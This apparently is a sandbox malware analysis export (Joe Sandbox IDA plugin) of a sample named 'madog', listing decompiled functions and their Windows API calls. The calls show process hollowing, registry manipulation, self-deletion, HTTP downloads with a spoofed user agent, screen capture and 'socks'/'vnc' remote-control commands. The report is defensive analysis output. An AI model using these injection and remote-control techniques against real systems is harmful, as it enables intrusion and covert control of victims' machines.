EnterCriticalSection.KERNEL32(00422AC8), ref: 00411064
LeaveCriticalSection.KERNEL32(00422AC8), ref: 004110E7
InternetCrackUrlA.WININET(?,?,00000000,?), ref: 004111B2

Part of subcall function 0041AE54: EnterCriticalSection.KERNEL32(00423FB4,?,004111CF,?), ref: 0041AE5B
Part of subcall function 0041AE54: LeaveCriticalSection.KERNEL32(00423FB4), ref: 0041AE90

Part of subcall function 0041AE9A: EnterCriticalSection.KERNEL32(00423FB4,?,00000000,004113AE,00000000), ref: 0041AEA6
Part of subcall function 0041AE9A: LeaveCriticalSection.KERNEL32(00423FB4), ref: 0041AEF1

InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 004113EC

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Part of subcall function 00410AA1: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00410C73
Part of subcall function 00410AA1: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00410C93
Part of subcall function 00410AA1: RegCloseKey.ADVAPI32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00410CA6
Part of subcall function 00410AA1: GetLocalTime.KERNEL32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00410CB5

Part of subcall function 00419B3E: CreateMutexW.KERNEL32(00422C30,00000000,00423F40,?,?,?,004079E5), ref: 00419B66

Strings

, xrefs: 00411301

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041C49B, Relevance: 9.1, APIs: 6, Instructions: 85

APIs

NtCreateUserProcess.NTDLL(?,?), ref: 0041C4CC

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040BB83), ref: 00412635

GetProcessId.KERNEL32(?), ref: 0041C509

Part of subcall function 0041245B: CreateMutexW.KERNELBASE(00422C30,00000001,?,00422E70,76C605D7,?,00000002,?,76C605D7), ref: 004124A3
Part of subcall function 0041245B: GetLastError.KERNEL32 ref: 004124AF
Part of subcall function 0041245B: CloseHandle.KERNEL32(00000000), ref: 004124BD

Part of subcall function 00412542: DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 00412574
Part of subcall function 00412542: WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000,?,?,?,?,0041316D,?,00000000,?,?,00000000), ref: 004125AB
Part of subcall function 00412542: WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000,?,?,?,?,0041316D,?,00000000,?,?,00000000), ref: 004125CB
Part of subcall function 00412542: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,0041316D,?,00000000), ref: 0041261A

GetThreadContext.KERNEL32 ref: 0041C557
SetThreadContext.KERNEL32(00000000,00000000), ref: 0041C596
VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000), ref: 0041C5AD
CloseHandle.KERNEL32(?), ref: 0041C5B7

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041D325, Relevance: 9.1, APIs: 6, Instructions: 78

APIs

Part of subcall function 00412828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 004128A1

PathRemoveFileSpecW.SHLWAPI(?), ref: 0041D34A
PathRemoveFileSpecW.SHLWAPI(?), ref: 0041D35D

Part of subcall function 0041C86B: SetEvent.KERNEL32(0041D36D,00000000), ref: 0041C871
Part of subcall function 0041C86B: WaitForSingleObject.KERNEL32(FFFFFFFF,000000FF), ref: 0041C884

Part of subcall function 0040BCAF: SHDeleteValueW.SHLWAPI(80000001,?,?), ref: 0040BCEC
Part of subcall function 0040BCAF: Sleep.KERNEL32(000001F4), ref: 0040BCFB
Part of subcall function 0040BCAF: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 0040BD11

Part of subcall function 00418A29: FindFirstFileW.KERNEL32(?,?,?,?), ref: 00418A5A
Part of subcall function 00418A29: FindNextFileW.KERNEL32(00000000,?), ref: 00418AB5
Part of subcall function 00418A29: FindClose.KERNEL32(00000000), ref: 00418AC0
Part of subcall function 00418A29: SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 00418ACC
Part of subcall function 00418A29: RemoveDirectoryW.KERNEL32(?), ref: 00418AD3

SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 0041D39B
CharToOemW.USER32(?,?), ref: 0041D3B7
CharToOemW.USER32(?,?), ref: 0041D3C6

Part of subcall function 004140F2: wvnsprintfA.SHLWAPI(?,0000026C,?,?), ref: 0041410D

ExitProcess.KERNEL32(00000000), ref: 0041D41C

Part of subcall function 00414E7B: CharToOemW.USER32(?,?), ref: 00414EAB
Part of subcall function 00414E7B: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00414F2F

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 004151FD, Relevance: 9.1, APIs: 6, Instructions: 74

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0041521D

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

WaitForSingleObject.KERNEL32(?,00000000), ref: 0041524B
InternetReadFile.WININET(00001000,?,00001000,?), ref: 00415267
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00415282
FlushFileBuffers.KERNEL32(00000000), ref: 004152A2

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

CloseHandle.KERNEL32(00000000), ref: 004152B5

Part of subcall function 00418716: SetFileAttributesW.KERNEL32(00000080,00000080,0041B4CD,?), ref: 0041871F
Part of subcall function 00418716: DeleteFileW.KERNEL32(?), ref: 00418729

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00417AF0, Relevance: 9.1, APIs: 6, Instructions: 72

APIs

WindowFromPoint.USER32(?,?), ref: 00417B0C
SendMessageTimeoutW.USER32(00000000,00000084,00000000,?,00000002,?,?), ref: 00417B3D
GetWindowLongW.USER32(00000000,000000F0), ref: 00417B61
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00417B72
GetWindowLongW.USER32(?,000000F0), ref: 00417B8F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00417B9D

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00405A94, Relevance: 9.1, APIs: 6, Instructions: 54

APIs

GetUpdateRgn.USER32(?,?,?), ref: 00405B1C

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040BB83), ref: 00412635

TlsGetValue.KERNEL32 ref: 00405AB4
SetRectRgn.GDI32(?,?,?,?,?), ref: 00405AD4
SaveDC.GDI32(?), ref: 00405AE4
SendMessageW.USER32(?,00000014,?,00000000), ref: 00405AF4
RestoreDC.GDI32(?,00000000), ref: 00405B06

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00414660, Relevance: 9.1, APIs: 6, Instructions: 53

APIs

CryptAcquireContextW.ADVAPI32(00418C87,00000000,00000000,00000001,F0000040,?,00418C87,?,00000030,?,?,?,004191A0,00423EC0), ref: 00414679
CryptCreateHash.ADVAPI32(00418C87,00008003,00000000,00000000,00000030,?,00418C87,?,00000030,?,?,?,004191A0,00423EC0), ref: 00414691
CryptHashData.ADVAPI32(00000030,00000010,00418C87,00000000,?,00418C87), ref: 004146AD
CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,00418C87), ref: 004146C5
CryptDestroyHash.ADVAPI32(00000030,?,00418C87), ref: 004146DC
CryptReleaseContext.ADVAPI32(00418C87,00000000,?,00418C87,?,00000030,?,?,?,004191A0,00423EC0), ref: 004146E6

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00406010, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 189

APIs

GetTickCount.KERNEL32(0000271B,00020000,00000000,00002719,00020000,00000000,00000000,000000FF,00000000), ref: 0040610F
GetUserNameExW.SECUR32(00000002,?,00000104), ref: 004061E6

Part of subcall function 004070A6: GetVersionExW.KERNEL32(?,?,00000000,00000006), ref: 004070CA
Part of subcall function 004070A6: GetNativeSystemInfo.KERNEL32(?), ref: 004070D8

GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,00000000,000000FF,00000000), ref: 00406162
GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,000000FF,00000000), ref: 004061A4

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Part of subcall function 004134BD: GetSystemTime.KERNEL32(?,?,?,004060C8,00000000,000000FF,00000000), ref: 004134C7
Part of subcall function 004134BD: SystemTimeToFileTime.KERNEL32(?,000000FF,?,?,004060C8,00000000,000000FF,00000000), ref: 004134D5

Part of subcall function 004134E5: GetTimeZoneInformation.KERNEL32(?), ref: 004134F4

Strings

, xrefs: 00406218

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00407125, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64

APIs

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00407138

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

LocalFree.KERNEL32(?,.exe,00000000), ref: 004071C0

Part of subcall function 004174DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00407194,?,?,00000104,.exe,00000000), ref: 004174F4
Part of subcall function 004174DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00407194,?,?,00000104), ref: 00417575

PathUnquoteSpacesW.SHLWAPI(?), ref: 004071A0
ExpandEnvironmentStringsW.KERNEL32(?,0041D23A,00000104), ref: 004071AD

Strings

.exe, xrefs: 00407147

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0040E0FB, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 47

APIs

GetCurrentThreadId.KERNEL32(7718F8FF), ref: 0040E108
GetThreadDesktop.USER32(00000000), ref: 0040E10F
GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 0040E128

Part of subcall function 0040DD09: TlsAlloc.KERNEL32(00422868,00000000,0000018C,00000000,00000000), ref: 0040DD22
Part of subcall function 0040DD09: RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 0040DD4A
Part of subcall function 0040DD09: CreateEventW.KERNEL32(00422C30,00000001,00000000,?,84889912,?,00000001), ref: 0040DD74
Part of subcall function 0040DD09: CreateMutexW.KERNEL32(00422C30,00000000,?,18782822,?,00000001), ref: 0040DD97
Part of subcall function 0040DD09: CreateFileMappingW.KERNEL32(00000000,00422C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 0040DDC2
Part of subcall function 0040DD09: MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0040DDD8
Part of subcall function 0040DD09: GetDC.USER32(00000000), ref: 0040DDF5
Part of subcall function 0040DD09: GetDeviceCaps.GDI32(00000000,00000008), ref: 0040DE15
Part of subcall function 0040DD09: GetDeviceCaps.GDI32(?,0000000A), ref: 0040DE1F
Part of subcall function 0040DD09: CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 0040DE32
Part of subcall function 0040DD09: ReleaseDC.USER32(00000000,?), ref: 0040DE56
Part of subcall function 0040DD09: CreateMutexW.KERNEL32(00422C30,00000000,?,1898B122,?,00000001,004228B8,?,00000102,004228A4,00422E70,00000010,?,?), ref: 0040DF00
Part of subcall function 0040DD09: GetDC.USER32(00000000), ref: 0040DF15
Part of subcall function 0040DD09: CreateCompatibleDC.GDI32(00000000), ref: 0040DF23
Part of subcall function 0040DD09: CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 0040DF3A
Part of subcall function 0040DD09: SelectObject.GDI32(00000000,00000000), ref: 0040DF4D
Part of subcall function 0040DD09: ReleaseDC.USER32(00000000,00000001), ref: 0040DF65

Part of subcall function 0040DF74: DeleteObject.GDI32(00000000), ref: 0040DF87
Part of subcall function 0040DF74: CloseHandle.KERNEL32(00000000), ref: 0040DF97
Part of subcall function 0040DF74: TlsFree.KERNEL32(00000000,00000000,00422868,00000000,0040E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040DFA2
Part of subcall function 0040DF74: CloseHandle.KERNEL32(00000000), ref: 0040DFB0
Part of subcall function 0040DF74: UnmapViewOfFile.KERNEL32(00000000,00000000,00422868,00000000,0040E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040DFBA
Part of subcall function 0040DF74: CloseHandle.KERNEL32(00000000), ref: 0040DFC7
Part of subcall function 0040DF74: SelectObject.GDI32(00000000,00000000), ref: 0040DFE1
Part of subcall function 0040DF74: DeleteObject.GDI32(00000000), ref: 0040DFF2
Part of subcall function 0040DF74: DeleteDC.GDI32(00000000), ref: 0040DFFF
Part of subcall function 0040DF74: CloseHandle.KERNEL32(00000000), ref: 0040E010
Part of subcall function 0040DF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0040E01F
Part of subcall function 0040DF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 0040E038

Strings

N, xrefs: 0040E132
h(B, xrefs: 0040E15E

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00414F8F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46

APIs

InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 00414FA6
InternetSetOptionA.WININET(00000000,00000002,0042200C,00000004), ref: 00414FC5
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00414FE2
InternetCloseHandle.WININET(00000000), ref: 00414FEE

Strings

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 00414F97, 00414FA5

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00415403, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44

APIs

LoadLibraryA.KERNEL32(urlmon.dll), ref: 00415414
GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00415427
FreeLibrary.KERNEL32(?), ref: 00415479

Strings

urlmon.dll, xrefs: 0041540D
ObtainUserAgentString, xrefs: 00415421

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041A24F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22

APIs

EnterCriticalSection.KERNEL32(00423F24), ref: 0041A265
SetEvent.KERNEL32(?), ref: 0041A286
LeaveCriticalSection.KERNEL32(00423F24), ref: 0041A28D

Strings

3, xrefs: 0041A256
$?B, xrefs: 0041A25F

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0040748F, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 207

APIs

lstrcmpiA.KERNEL32(?,socks,?,00000000,00000104), ref: 004074BE
lstrcmpiA.KERNEL32(?,vnc), ref: 004074D1

Part of subcall function 00417425: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00417444
Part of subcall function 00417425: CloseHandle.KERNEL32(?), ref: 00417450

Part of subcall function 00417477: SetLastError.KERNEL32(0000009B,00412AC8,00000000,0040BB5F,00000000,00422AF0,00000000,00000104,76C605D7,00000000), ref: 00417481
Part of subcall function 00417477: CreateThread.KERNEL32(00000000,00422AF0,00422AF0,00422AF0,00000000,00000000), ref: 004174A4

Part of subcall function 0041675E: shutdown.WS2_32(?,00000002), ref: 00416766
Part of subcall function 0041675E: closesocket.WS2_32(?), ref: 0041676D

Part of subcall function 004174BC: WaitForMultipleObjects.KERNEL32(?,00422AEC,00000001,000000FF), ref: 004174CE

CloseHandle.KERNEL32(?), ref: 004076EE

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Part of subcall function 00416B8E: ReleaseMutex.KERNEL32(00000000,00413021,?,?,?), ref: 00416B92

Part of subcall function 00416444: getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 00416463
Part of subcall function 00416444: freeaddrinfo.WS2_32(?,?,?,?,?,00407284,?), ref: 004164B0

Part of subcall function 004167B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 004167CC

Part of subcall function 00416774: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 004167A7

Part of subcall function 0041666B: select.WS2_32(00000000,?,00000000,00000000,00000001), ref: 004166EA
Part of subcall function 0041666B: WSASetLastError.WS2_32(0000274C), ref: 004166F9

Part of subcall function 0041636E: recv.WS2_32(?,?,00000001,00000000), ref: 00416392

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

Strings

socks, xrefs: 004074B7
vnc, xrefs: 004074CA

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00409D55, Relevance: 7.7, APIs: 5, Instructions: 202

APIs

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 00409E0C
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00409E37
RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?,?,?,000000FF,?,?,000000FF,?,?,000000FF), ref: 00409ED7

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

Part of subcall function 00417607: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00419E26,?,?,?,004175CD,?,?,00000000,00000004,?), ref: 0041761F
Part of subcall function 00417607: RegCloseKey.ADVAPI32(?,?,004175CD,?,?,00000000,00000004,?,?,?,?,00419E26,?,?), ref: 0041762D

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 00409F7A
RegCloseKey.ADVAPI32(?), ref: 00409F8D

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Part of subcall function 004174DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00407194,?,?,00000104,.exe,00000000), ref: 004174F4
Part of subcall function 004174DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00407194,?,?,00000104), ref: 00417575

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00408E1B, Relevance: 7.7, APIs: 5, Instructions: 158

APIs

Part of subcall function 00418C40: PathCombineW.SHLWAPI(00411F45,00411F45,?), ref: 00418C5F

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00408E82
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,000000FF,000000FF,?), ref: 00408F16
GetPrivateProfileIntW.KERNEL32(00000015,?,00000015,?), ref: 00408F34
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,?,000000FF,?), ref: 00408F5F
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000,000000FF,?), ref: 00408F7B

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00419224, Relevance: 7.6, APIs: 5, Instructions: 111

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000004,00000080,00000000), ref: 00419245

Part of subcall function 004186EF: GetFileSizeEx.KERNEL32(0041925C,0041925C,?,?,?,0041925C,00000000), ref: 004186FB

ReadFile.KERNEL32(?,?,00000005,00000000,00000000), ref: 00419286
CloseHandle.KERNEL32(?), ref: 00419292
ReadFile.KERNEL32(?,?,00000005,00000005,00000000), ref: 00419301
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 00419327

Part of subcall function 0041869F: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 004186B1

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00419959, Relevance: 7.6, APIs: 5, Instructions: 99

APIs

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

GetDIBits.GDI32(00000000,0040DE4B,00000000,00000001,00000000,00000000,00000000), ref: 00419991
GetDIBits.GDI32(00000000,0040DE4B,00000000,00000001,00000000,00000000,00000000), ref: 004199A7
DeleteObject.GDI32(0040DE4B), ref: 004199B4
CreateDIBSection.GDI32(00000000,00000000,00000000,00422888,?,?), ref: 00419A24

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

DeleteObject.GDI32(0040DE4B), ref: 00419A43

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041A298, Relevance: 7.6, APIs: 5, Instructions: 94

APIs

ResetEvent.KERNEL32(?), ref: 0041A2A6

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

InternetSetStatusCallbackW.WININET(?,0041A24F), ref: 0041A2DB
InternetReadFileExA.WININET ref: 0041A31B
GetLastError.KERNEL32 ref: 0041A325

Part of subcall function 00416B28: TranslateMessage.USER32(?), ref: 00416B4A
Part of subcall function 00416B28: DispatchMessageW.USER32(?), ref: 00416B55
Part of subcall function 00416B28: PeekMessageW.USER32(00000000), ref: 00416B65
Part of subcall function 00416B28: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00416B79

InternetSetStatusCallbackW.WININET(?,?), ref: 0041A389

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Part of subcall function 00413346: HeapAlloc.KERNEL32(00000008,-00000003,004136F5,?,?,00000000,004141E1,?,?,?,?,?,00414191,?,?,?), ref: 00413368
Part of subcall function 00413346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,004136F5,?,?,00000000,004141E1,?,?,?,?,?,00414191,?,?), ref: 00413379

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041B3EC, Relevance: 7.6, APIs: 5, Instructions: 85

APIs

Part of subcall function 00418C40: PathCombineW.SHLWAPI(00411F45,00411F45,?), ref: 00418C5F

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0041B437
WriteFile.KERNEL32(0041B3D4,?,00000146,?,00000000), ref: 0041B475
WriteFile.KERNEL32(0041B3D4,?,00000000,?,00000000), ref: 0041B499
FlushFileBuffers.KERNEL32(0041B3D4), ref: 0041B4AD
CloseHandle.KERNEL32(0041B3D4), ref: 0041B4B6

Part of subcall function 00418716: SetFileAttributesW.KERNEL32(00000080,00000080,0041B4CD,?), ref: 0041871F
Part of subcall function 00418716: DeleteFileW.KERNEL32(?), ref: 00418729

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
